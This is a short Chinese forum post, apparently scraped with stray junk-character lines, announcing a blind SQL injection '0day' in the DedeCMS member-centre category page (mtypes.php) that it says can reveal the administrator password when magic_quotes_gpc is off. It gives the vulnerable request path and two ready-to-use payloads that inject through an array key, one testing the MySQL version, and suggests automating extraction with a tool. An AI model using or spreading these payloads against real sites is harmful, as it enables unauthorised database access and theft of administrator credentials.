DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码

admin

需要magic_quotes_gpc = Off,所以说是鸡肋啊.
- O" n$ F" f7 _1 S( h. J

( q- N3 M6 h/ c3 h8 s0 X5 y( `发生在数组key里的注射漏洞,有点意思.

这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
( y4 A1 V" Z+ _" s9 N- T
" H  v( I2 o& `5 w, g$ U1 rhttp://www.xxx.com /dede/member/mtypes.php?dopost=save

7 k: U5 a- ?+ Q- f5 x0 B' Vexploit:
' k7 C5 s- y& x+ Rmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
  i7 G8 Q. w! n- e. b. b. Nmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
0 L7 S  y5 p% P